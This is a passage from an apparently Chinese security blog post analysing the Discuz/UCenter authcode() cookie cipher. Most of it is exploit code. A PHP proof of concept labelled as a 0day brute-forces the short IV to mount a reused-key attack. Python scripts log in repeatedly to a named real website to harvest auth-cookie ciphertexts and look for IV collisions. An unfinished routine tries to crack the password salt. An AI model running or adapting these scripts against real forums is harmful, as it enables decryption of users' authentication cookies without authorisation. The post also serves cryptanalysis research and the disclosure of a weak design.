\/\/ \u53c2\u4e0e\u8fd0\u7b97\u7684\u5bc6\u5319<\/p>\n
$cryptkey = $keya.md5($keya.$keyc);<\/p>\n
$key_length = strlen($cryptkey);<\/p>\n
\/\/ \u660e\u6587\uff0c\u524d10\u4f4d\u7528\u6765\u4fdd\u5b58\u65f6\u95f4\u6233\uff0c\u89e3\u5bc6\u65f6\u9a8c\u8bc1\u6570\u636e\u6709\u6548\u6027\uff0c10\u523026\u4f4d\u7528\u6765\u4fdd\u5b58$keyb(\u5bc6\u5319b)\uff0c\u89e3\u5bc6\u65f6\u4f1a\u901a\u8fc7\u8fd9\u4e2a\u5bc6\u5319\u9a8c\u8bc1\u6570\u636e\u5b8c\u6574\u6027<\/p>\n
\/\/ \u5982\u679c\u662f\u89e3\u7801\u7684\u8bdd\uff0c\u4f1a\u4ece\u7b2c$ckey_length\u4f4d\u5f00\u59cb\uff0c\u56e0\u4e3a\u5bc6\u6587\u524d$ckey_length\u4f4d\u4fdd\u5b58 \u52a8\u6001\u5bc6\u5319\uff0c\u4ee5\u4fdd\u8bc1\u89e3\u5bc6\u6b63\u786e<\/p>\n
$string = $operation == ‘DECODE’ ? base64_decode(substr($string, $ckey_length)) : sprintf(‘%010d’, $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;<\/p>\n
$string_length = strlen($string);<\/p>\n
$result = ”;<\/p>\n
$box = range(0, 255);<\/p>\n
$rndkey = array();<\/p>\n
\/\/ \u4ea7\u751f\u5bc6\u5319\u7c3f<\/p>\n
for($i = 0; $i <= 255; $i++) {<\/p>\n
$rndkey[$i] = ord($cryptkey[$i % $key_length]);<\/p>\n
}<\/p>\n
\/\/ \u7528\u56fa\u5b9a\u7684\u7b97\u6cd5\uff0c\u6253\u4e71\u5bc6\u5319\u7c3f\uff0c\u589e\u52a0\u968f\u673a\u6027\uff0c\u597d\u50cf\u5f88\u590d\u6742\uff0c\u5b9e\u9645\u4e0a\u5bf9\u5e76\u4e0d\u4f1a\u589e\u52a0\u5bc6\u6587\u7684\u5f3a\u5ea6<\/p>\n
for($j = $i = 0; $i < 256; $i++) {<\/p>\n
$j = ($j + $box[$i] + $rndkey[$i]) % 256;<\/p>\n
$tmp = $box[$i];<\/p>\n
$box[$i] = $box[$j];<\/p>\n
$box[$j] = $tmp;<\/p>\n
}<\/p>\n
\/\/ \u6838\u5fc3\u52a0\u89e3\u5bc6\u90e8\u5206<\/p>\n
for($a = $j = $i = 0; $i < $string_length; $i++) {<\/p>\n
$a = ($a + 1) % 256;<\/p>\n
$j = ($j + $box[$a]) % 256;<\/p>\n
$tmp = $box[$a];<\/p>\n
$box[$a] = $box[$j];<\/p>\n
$box[$j] = $tmp;<\/p>\n
\/\/ \u4ece\u5bc6\u5319\u7c3f\u5f97\u51fa\u5bc6\u5319\u8fdb\u884c\u5f02\u6216\uff0c\u518d\u8f6c\u6210\u5b57\u7b26<\/p>\n
\u00a0$result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));<\/strong><\/p>\n }<\/p>\n if($operation == ‘DECODE’) {<\/p>\n \/\/ \u9a8c\u8bc1\u6570\u636e\u6709\u6548\u6027\uff0c\u8bf7\u770b\u672a\u52a0\u5bc6\u660e\u6587\u7684\u683c\u5f0f<\/p>\n if((substr($result, 0, 10) == 0 || substr($result, 0, 10) – time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {<\/p>\n return substr($result, 26);<\/p>\n } else {<\/p>\n return ”;<\/p>\n }<\/p>\n } else {<\/p>\n \/\/ \u628a\u52a8\u6001\u5bc6\u5319\u4fdd\u5b58\u5728\u5bc6\u6587\u91cc\uff0c\u8fd9\u4e5f\u662f\u4e3a\u4ec0\u4e48\u540c\u6837\u7684\u660e\u6587\uff0c\u751f\u4ea7\u4e0d\u540c\u5bc6\u6587\u540e\u80fd\u89e3\u5bc6\u7684\u539f\u56e0<\/p>\n \/\/ \u56e0\u4e3a\u52a0\u5bc6\u540e\u7684\u5bc6\u6587\u53ef\u80fd\u662f\u4e00\u4e9b\u7279\u6b8a\u5b57\u7b26\uff0c\u590d\u5236\u8fc7\u7a0b\u53ef\u80fd\u4f1a\u4e22\u5931\uff0c\u6240\u4ee5\u7528base64\u7f16\u7801<\/p>\n return $keyc.str_replace(‘=’, ”, base64_encode($result));<\/p>\n }<\/p>\n }<\/p>\n ======================================================================<\/p>\n \u5728\u8fd9\u4e2a\u51fd\u6570\u4e2d\uff0ckeyc \u5c31\u662fIV\uff08\u521d\u59cb\u5316\u5411\u91cf\uff09\uff0c ckey_length \u5c31\u662fIV\u7684\u957f\u5ea6\u3002$ckey_length = 0\u65f6\uff0c\u6ca1\u6709IV\u3002<\/p>\n <\/p>\n IV\u7684\u610f\u4e49\u5c31\u662f\u4e3a\u4e86\u4e00\u6b21\u4e00\u5bc6\uff0c\u5b83\u5f71\u54cd\u5230\u771f\u6b63\u6bcf\u6b21\u7528\u4e8e\u52a0\u5bc6\u7684XOR KEY\u3002<\/p>\n \u800c\u201cReused Key Attack\u201d\u7684\u524d\u63d0\u5c31\u662f\u8981\u6c42XOR KEY\u662f\u76f8\u540c\u7684\u3002\u4f46discuz\u9ed8\u8ba4\u4f7f\u7528\u7684IV\u957f\u5ea6\u662f4\uff0c\u8fd9\u5e76\u4e0d\u662f\u4e00\u4e2a\u5f88\u5927\u7684\u503c<\/strong>\uff0c\u56e0\u6b64\u53ef\u4ee5\u904d\u5386\u51fa\u6240\u6709\u7684IV\u53ef\u80fd\u503c\u3002\u4e00\u65e6IV\u51fa\u73b0\u91cd\u590d\uff0c\u5c31\u610f\u5473\u7740XOR KEY\u4e5f\u91cd\u590d\u4e86\uff0c\u56e0\u6b64\u53ef\u4ee5\u5b9e\u65bd\u201cReused Key Attack\u201d\u3002<\/p>\n \u5982\u4e0b\u6f14\u793a\u4ee3\u7801<\/strong>\uff1a<\/p>\n <\/p>\n <?php<\/p>\n <\/p>\n define(‘UC_KEY’,’asdfasfas’);<\/p>\n <\/p>\n $plaintext1 = “2626”;<\/p>\n $plaintext2 = “2630”;<\/p>\n <\/p>\n $guess_result = “”;<\/p>\n <\/p>\n $time_start = time();<\/p>\n <\/p>\n $dict = array();<\/p>\n global $ckey_length;<\/p>\n $ckey_length = 4;<\/p>\n <\/p>\n echo “== Discuz\/UCenter authcode() stream cipher attack exploit v2(crack plaintext)\\n”;<\/p>\n echo “== 0day by axis ==\\n”;<\/p>\n echo “== 2011.9.2 ==\\n\\n”;<\/p>\n <\/p>\n echo “Collecting Dictionary(XOR Keys).\\n”;<\/p>\n <\/p>\n <\/p>\n $cipher2 = authcode($plaintext2, “ENCODE” , UC_KEY);<\/p>\n <\/p>\n $counter = 0;<\/p>\n for (;;){<\/p>\n $counter ++;<\/p>\n $cipher1 = authcode($plaintext1, “ENCODE” , UC_KEY);<\/p>\n $keyc1 = substr($cipher1, 0, $ckey_length);<\/p>\n $cipher1 = base64_decode(substr($cipher1, $ckey_length));<\/p>\n $dict[$keyc1] = $cipher1;<\/p>\n if \u00a0( $counter%1000 == 0){<\/p>\n echo “.”;<\/p>\n if ($guess_result = guess($dict, $cipher2)){<\/p>\n break;<\/p>\n }<\/p>\n }<\/p>\n }<\/p>\n <\/p>\n array_unique($dict);<\/p>\n <\/p>\n echo “\\nDictionary Collecting Finished..\\n”;<\/p>\n echo “Collected “.count($dict).” XOR Keys\\n”;<\/p>\n <\/p>\n function guess($dict, $cipher2){<\/p>\n global $plaintext1,$ckey_length;<\/p>\n <\/p>\n $keyc2 = substr($cipher2, 0, $ckey_length);<\/p>\n $cipher2 = base64_decode(substr($cipher2, $ckey_length));<\/p>\n <\/p>\n for ($i=0; $i<count($dict); $i++){<\/p>\n if (array_key_exists($keyc2, $dict)){<\/p>\n echo “\\nFound key in dictionary!\\n”;<\/p>\n echo “keyc is: “.$keyc2.”\\n”;<\/p>\n return crack($plaintext1,$dict[$keyc2],$cipher2);<\/p>\n break;<\/p>\n }<\/p>\n }<\/p>\n return False;<\/p>\n }<\/p>\n <\/p>\n <\/p>\n echo “\\ncounter is:”.$counter.”\\n”;<\/p>\n $time_spend = time() – $time_start;<\/p>\n echo “crack time is: “.$time_spend.” seconds \\n”;<\/p>\n echo “crack result is :”.$guess_result.”\\n”;<\/p>\n <\/p>\n function crack($plain, $cipher_p, $cipher_t){<\/p>\n $target = ”;<\/p>\n $tmp_p = substr($cipher_p, 26);<\/p>\n echo hex($tmp_p).”\\n”;<\/p>\n $tmp_t = substr($cipher_t, 26);<\/p>\n echo hex($tmp_t).”\\n”;<\/p>\n for ($i=0;$i<strlen($plain);$i++){<\/p>\n $target .= chr(ord($plain[$i]) ^ ord($tmp_p[$i]) ^ ord($tmp_t[$i]));<\/p>\n }<\/p>\n return $target;<\/p>\n }<\/p>\n <\/p>\n <\/p>\n function hex($str){<\/p>\n $result = ”;<\/p>\n for ($i=0;$i<strlen($str);$i++){<\/p>\n $result .= “\\\\”.ord($str[$i]);<\/p>\n }<\/p>\n return $result;<\/p>\n }<\/p>\n <\/p>\n function authcode($string, $operation = ‘DECODE’, $key = ”, $expiry = 0) {<\/p>\n <\/p>\n global $ckey_length;<\/p>\n \/\/$ckey_length = 4;<\/p>\n <\/p>\n $key = md5($key ? $key : UC_KEY);<\/p>\n $keya = md5(substr($key, 0, 16));<\/p>\n $keyb = md5(substr($key, 16, 16));<\/p>\n $keyc = $ckey_length ? ($operation == ‘DECODE’ ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : ”;<\/p>\n <\/p>\n $cryptkey = $keya.md5($keya.$keyc);<\/p>\n $key_length = strlen($cryptkey);<\/p>\n <\/p>\n $string = $operation == ‘DECODE’ ? base64_decode(substr($string, $ckey_length)) : sprintf(‘%010d’, $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;<\/p>\n $string_length = strlen($string);<\/p>\n <\/p>\n $result = ”;<\/p>\n $box = range(0, 255);<\/p>\n <\/p>\n $rndkey = array();<\/p>\n for($i = 0; $i <= 255; $i++) {<\/p>\n $rndkey[$i] = ord($cryptkey[$i % $key_length]);<\/p>\n }<\/p>\n <\/p>\n for($j = $i = 0; $i < 256; $i++) {<\/p>\n $j = ($j + $box[$i] + $rndkey[$i]) % 256;<\/p>\n $tmp = $box[$i];<\/p>\n $box[$i] = $box[$j];<\/p>\n $box[$j] = $tmp;<\/p>\n }<\/p>\n <\/p>\n \/\/$xx = ”; \/\/ real key<\/p>\n for($a = $j = $i = 0; $i < $string_length; $i++) {<\/p>\n $a = ($a + 1) % 256;<\/p>\n $j = ($j + $box[$a]) % 256;<\/p>\n $tmp = $box[$a];<\/p>\n $box[$a] = $box[$j];<\/p>\n $box[$j] = $tmp;<\/p>\n \/\/$xx .= chr($box[($box[$a] + $box[$j]) % 256]);<\/p>\n $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));<\/p>\n }<\/p>\n \/\/echo “xor key is: “.hex($xx).”\\n”;<\/p>\n <\/p>\n if($operation == ‘DECODE’) {<\/p>\n if((substr($result, 0, 10) == 0 || substr($result, 0, 10) – time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {<\/p>\n return substr($result, 26);<\/p>\n } else {<\/p>\n return ”;<\/p>\n }<\/p>\n } else {<\/p>\n return $keyc.str_replace(‘=’, ”, base64_encode($result));<\/p>\n }<\/p>\n }<\/p>\n <\/p>\n ?><\/p>\n <\/p>\n <\/p>\n \u6d4b\u8bd5\u6548\u679c\uff1a<\/p>\n \u5728\u5b9e\u9645\u4e92\u8054\u7f51\u4e2d\uff0c\u8981\u5f3a\u8feb\u51fa\u73b0\u91cd\u590d\u7684IV\u4e5f\u4e0d\u662f\u4ec0\u4e48\u96be\u4e8b\u3002IV\u4e0d\u662f\u4fdd\u5bc6\u4fe1\u606f\uff0c\u5bc6\u6587\u7684\u524d4\u5b57\u8282\u5c31\u662fIV\u7684\u503c\u3002<\/p>\n \u4ee5\u4e0b\u6f14\u793a\u4ee3\u7801<\/strong>\uff0c\u5c06\u4ece\u4e00\u4e2a\u7f51\u7ad9\u4e2d\u904d\u5386\u51fa\u91cd\u590d\u7684IV\u3002<\/p>\n \u6bcf\u6b21\u8bf7\u6c42\u6293\u53d6\u5230\u7684\u5bc6\u6587\u548cIV\uff0c\u4f1a\u5b58\u653e\u5728\u672c\u5730\u6570\u636e\u5e93\u4e2d\u3002\u901a\u8fc7\u53e6\u4e00\u4e2a\u7a0b\u5e8f\u5468\u671f\u6027\u7684\u67e5\u8be2\u6570\u636e\u5e93\uff0c\u770b\u662f\u5426\u51fa\u73b0\u4e86\u91cd\u590d\u7684IV\u3002\u6839\u636ebirthday attack\u7684\u539f\u7406\uff0c\u542f\u52a8\u4e86\u4e24\u4e2a\u6293\u53d6\u8fdb\u7a0b\uff08\u6ce8\u518c\u4e86\u4e24\u4e2a\u7f51\u7ad9\u7528\u6237\uff0c\u4ee5\u4fbf\u4ea7\u751f\u51fa\u4e0d\u540c\u7684\u660e\u6587\u7528\u4e8e\u52a0\u5bc6\uff09\uff0c\u5206\u522b\u5c06\u53d6\u56de\u7684\u5bc6\u6587\u5b58\u5728\u4e24\u5f20\u8868\u91cc\u3002\u4e24\u4e2a\u6293\u53d6\u7a0b\u5e8f\u7684\u4ee3\u7801\u662f\u4e00\u6837\u7684\u3002\u7531\u4e8e\u65f6\u95f4\u5173\u7cfb\uff0c\u6ca1\u6709\u518d\u6b21\u4f18\u5316\u8fd9\u4e2aPOC\u4e86\u3002<\/p>\n grab_cipher1.py\uff1a<\/p>\n <\/p>\n ======================================================================<\/p>\n import string<\/p>\n import urllib2<\/p>\n import urllib<\/p>\n #from urlparse import urlparse<\/p>\n import httplib<\/p>\n import Cookie<\/p>\n import sqlite3<\/p>\n import base64<\/p>\n import operator<\/p>\n <\/p>\n #url = “http:\/\/photo003.com\/member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes&inajax=1”<\/p>\n #req = urllib2.Request(url,data,headers)<\/p>\n #f = urllib2.urlopen(req)<\/p>\n <\/p>\n # Step1 get cipher1 of plaintext1 to generate dictionary<\/p>\n <\/p>\n dbcon = sqlite3.connect(‘.\/authcode.db’)<\/p>\n c = dbcon.cursor()<\/p>\n # \u5982\u679c\u662f\u7b2c\u4e00\u6b21\u6267\u884c\uff0c\u9700\u8981\u521b\u5efa\u8868\uff0c\u4e4b\u540e\u5219\u4e0d\u518d\u9700\u8981<\/p>\n #c.execute(‘CREATE TABLE photo003_2626(id INTEGER PRIMARY KEY, iv VARCHAR(32), cipher TEXT)’)<\/p>\n <\/p>\n dbcon.text_factory = str<\/p>\n <\/p>\n <\/p>\n for i in range(0,10000):<\/p>\n headers = {‘User-Agent’:’Mozilla\/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.20) Gecko\/20110803 Firefox\/3.6.20′,<\/p>\n ‘Content-Type’:’application\/x-www-form-urlencoded’,<\/p>\n ‘Referer’:’http:\/\/photo003.com\/’,<\/p>\n ‘Cookie’:’79uz_d57e_lastvisit=1315289799; 79uz_d57e_sid=mwblLl; 79uz_d57e_lastact=1315293401%09home.php%09misc; 79uz_d57e_sendmail=1; pgv_pvi=5521148000; pgv_info=ssi=s4855221700; cnzz_a2048277=0; sin2048277=; rtime=0; ltime=1315293240710; cnzz_eid=24694723-1315293457-; lzstat_uv=25192795223599758253|1758779; lzstat_ss=273007993_0_1315322042_1758779′}<\/p>\n data = {‘username’:’\u8bf7\u66ff\u6362username’,’password’:’\u8bf7\u66ff\u6362pass’,’quickforward’:’yes’,’handlekey’:’ls’}<\/p>\n data = urllib.urlencode(data)<\/p>\n <\/p>\n conn = httplib.HTTPConnection(“photo003.com”)<\/p>\n conn.request(‘POST’,<\/p>\n ‘\/member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes&inajax=1’,<\/p>\n data,<\/p>\n headers)<\/p>\n <\/p>\n res = conn.getresponse()<\/p>\n <\/p>\n if res:<\/p>\n cookies = Cookie.SimpleCookie()<\/p>\n cookies.load(res.getheader(“Set-Cookie”))<\/p>\n <\/p>\n authcookie = urllib.unquote(cookies[“79uz_d57e_auth”].value)<\/p>\n iv = authcookie[0:4]<\/p>\n cipher = base64.b64decode(authcookie[4:])<\/p>\n c.execute(‘INSERT INTO\u00a0photo003_2626(iv, cipher)<\/strong>\u00a0VALUES (?, ?)’,(iv, cipher))<\/p>\n <\/p>\n dbcon.commit()<\/p>\n print str(i) + ‘ \u00a0 ‘ + iv<\/p>\n <\/p>\n ======================================================================<\/p>\n <\/p>\n grab_cipher2.py\uff1a<\/p>\n ======================================================================<\/p>\n <\/p>\n import string<\/p>\n import urllib2<\/p>\n import urllib<\/p>\n #from urlparse import urlparse<\/p>\n import httplib<\/p>\n import Cookie<\/p>\n import sqlite3<\/p>\n import base64<\/p>\n import operator<\/p>\n <\/p>\n #url = “http:\/\/photo003.com\/member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes&inajax=1”<\/p>\n #req = urllib2.Request(url,data,headers)<\/p>\n #f = urllib2.urlopen(req)<\/p>\n <\/p>\n # Step1 get cipher1 of plaintext1 to generate dictionary<\/p>\n <\/p>\n dbcon = sqlite3.connect(‘.\/authcode.db’)<\/p>\n c = dbcon.cursor()<\/p>\n #c.execute(‘CREATE TABLE photo003_2630(id INTEGER PRIMARY KEY, iv VARCHAR(32), cipher TEXT)’)<\/p>\n <\/p>\n dbcon.text_factory = str<\/p>\n <\/p>\n <\/p>\n for i in range(0,10000):<\/p>\n headers = {‘User-Agent’:’Mozilla\/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.20) Gecko\/20110803 Firefox\/3.6.20′,<\/p>\n ‘Content-Type’:’application\/x-www-form-urlencoded’,<\/p>\n ‘Referer’:’http:\/\/photo003.com\/’,<\/p>\n ‘Cookie’:’79uz_d57e_lastvisit=1315289799; 79uz_d57e_sid=mwblLl; 79uz_d57e_lastact=1315293401%09home.php%09misc; 79uz_d57e_sendmail=1; pgv_pvi=5521148000; pgv_info=ssi=s4855221700; cnzz_a2048277=0; sin2048277=; rtime=0; ltime=1315293240710; cnzz_eid=24694723-1315293457-; lzstat_uv=25192795223599758253|1758779; lzstat_ss=273007993_0_1315322042_1758779′}<\/p>\n data = {‘username’:’\u8bf7\u66ff\u6362username2′,’password’:’\u8bf7\u66ff\u6362pass2′,’quickforward’:’yes’,’handlekey’:’ls’}<\/p>\n data = urllib.urlencode(data)<\/p>\n <\/p>\n conn = httplib.HTTPConnection(“photo003.com”)<\/p>\n conn.request(‘POST’,<\/p>\n ‘\/member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes&inajax=1’,<\/p>\n data,<\/p>\n headers)<\/p>\n <\/p>\n res = conn.getresponse()<\/p>\n <\/p>\n if res:<\/p>\n cookies = Cookie.SimpleCookie()<\/p>\n cookies.load(res.getheader(“Set-Cookie”))<\/p>\n <\/p>\n authcookie = urllib.unquote(cookies[“79uz_d57e_auth”].value)<\/p>\n iv = authcookie[0:4]<\/p>\n cipher = base64.b64decode(authcookie[4:])<\/p>\n c.execute(‘INSERT INTO\u00a0photo003_2630<\/strong>(iv, cipher) VALUES (?, ?)’,(iv, cipher))<\/p>\n <\/p>\n dbcon.commit()<\/p>\n print str(i) + ‘ \u00a0 ‘ + iv<\/p>\n <\/p>\n <\/p>\n ======================================================================<\/p>\n <\/p>\n crack_discuz_authcode.py\uff1a<\/p>\n ======================================================================<\/p>\n <\/p>\n import string<\/p>\n import urllib2<\/p>\n import urllib<\/p>\n #from urlparse import urlparse<\/p>\n import httplib<\/p>\n import Cookie<\/p>\n import sqlite3<\/p>\n import base64<\/p>\n import operator<\/p>\n import md5<\/p>\n import random<\/p>\n <\/p>\n <\/p>\n def crack(plain1, cipher1, cipher2):<\/p>\n plain2 = ”<\/p>\n for i in range(0,len(plain1)):<\/p>\n ch = operator.xor(ord(plain1[i]), ord(cipher1[i]))<\/p>\n plain2 += chr(operator.xor(ch, ord(cipher2[i])))<\/p>\n return plain2<\/p>\n <\/p>\n def bytecode(st):<\/p>\n s = ”<\/p>\n for c in st:<\/p>\n s = s + str(ord(c)) + ‘,’<\/p>\n return s<\/p>\n <\/p>\n def list_iv_collision():<\/p>\n dbcon = sqlite3.connect(‘.\/authcode.db’)<\/p>\n c = dbcon.cursor()<\/p>\n <\/p>\n dbcon.text_factory = str<\/p>\n <\/p>\n c.execute(‘select * from photo003_2626’)<\/p>\n r1 = c.fetchall()<\/p>\n <\/p>\n c.execute(‘select * from photo003_2630’)<\/p>\n r2 = c.fetchall()<\/p>\n if r1 and r2:<\/p>\n for c1 in r1:<\/p>\n for c2 in r2:<\/p>\n if c1[1] == c2[1]:<\/p>\n print c1[1] + ‘ \u00a0 ‘ + c2[1]<\/p>\n c.close()<\/p>\n <\/p>\n <\/p>\n dbcon = sqlite3.connect(‘.\/authcode.db’)<\/p>\n c = dbcon.cursor()<\/p>\n <\/p>\n dbcon.text_factory = str<\/p>\n <\/p>\n list_iv_collision()<\/p>\n <\/p>\n ###################################<\/p>\n # \u00a0\u4e0b\u9762\u7684\u4ee3\u7801\u5c1d\u8bd5\u7834\u89e3salt\uff0c\u6b64\u529f\u80fd\u5c1a\u672a\u5b8c\u6210<\/p>\n ###################################<\/p>\n iv = “dee5”<\/p>\n pwd = “password”<\/p>\n <\/p>\n c.execute(‘select * from photo003_2626 where iv=?’, (iv,))<\/p>\n r1 = c.fetchone()<\/p>\n <\/p>\n c.execute(‘select * from photo003_2630 where iv=?’, (iv,))<\/p>\n r2 = c.fetchone()<\/p>\n <\/p>\n if r1 and r2:<\/p>\n for x in range(0,99999999):<\/p>\n csets = “abcdefghijklmnopqrstuvwxyz0123456789″<\/p>\n salt = ”<\/p>\n for i in range(0,6):<\/p>\n salt += random.choice(csets)<\/p>\n plain1 = md5.new(md5.new(pwd).hexdigest() + salt).hexdigest() + ‘\\t’ + ‘2626’<\/p>\n #print salt<\/p>\n #print plain1<\/p>\n plain2 = crack(plain1, r1[2][26:], r2[2][26:] )<\/p>\n #print plain2<\/p>\n if plain1[0:32] == plain2[0:32]:<\/p>\n print salt<\/p>\n print ‘counter is:’ + str(x)<\/p>\n break<\/p>\n if x%100000 == 0:<\/p>\n print str(x) + ‘ \u00a0 \u00a0‘ + salt<\/p>\n <\/p>\n c.close()<\/p>\n <\/p>\n <\/p>\n ======================================================================<\/p>\n <\/p>\n \u6d4b\u8bd5\u6548\u679c\uff1a<\/p>\n <\/p>\n \u5728\u5341\u51e0\u5206\u949f\u5185\u5c31\u80fd\u6536\u96c6\u5230\u5f88\u591a\u91cd\u590d\u7684IV\u3002<\/p>\n <\/p>\n \u901a\u8fc7\u8fd9\u6837\u7684\u65b9\u6cd5\u8fd8\u80fd\u591f\u7834\u89e3salt\uff0c\u4f46\u7531\u4e8e\u65f6\u95f4\u5173\u7cfb\uff0c\u6211\u6ca1\u6709\u7ee7\u7eed\u5b8c\u6210\u6b64\u6bb5\u4ee3\u7801\u4e86\uff0c\u6709\u5174\u8da3\u7684\u8bfb\u8005\u53ef\u4ee5\u7ee7\u7eed\u7814\u7a76\u4e0b\u53bb\u3002<\/p>\n <\/p>\n authcode()\u51fd\u6570\u7531\u4e8e\u6709HMAC\u7684\u5b58\u5728\u56e0\u6b64\u65e0\u6cd5\u4f2a\u9020\u51fa\u4efb\u610f\u660e\u6587\u7684\u5bc6\u6587\u3002\u8fd9\u662f\u56e0\u4e3aHMAC\u7684\u751f\u6210\u4e0e\u670d\u52a1\u7aef\u5bc6\u94a5\u6709\u5173\uff0c\u5728\u672a\u77e5\u5bc6\u94a5\u7684\u60c5\u51b5\u4e0b\uff0c\u662f\u65e0\u6cd5\u6784\u9020\u51fa\u5408\u6cd5\u7684HMAC\u7684\u3002<\/p>\n![\"\"](\"http:\/\/notes.zerobox.org\/wp-content\/uploads\/2011\/11\/11.png\" "\\"1\\"")
<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\n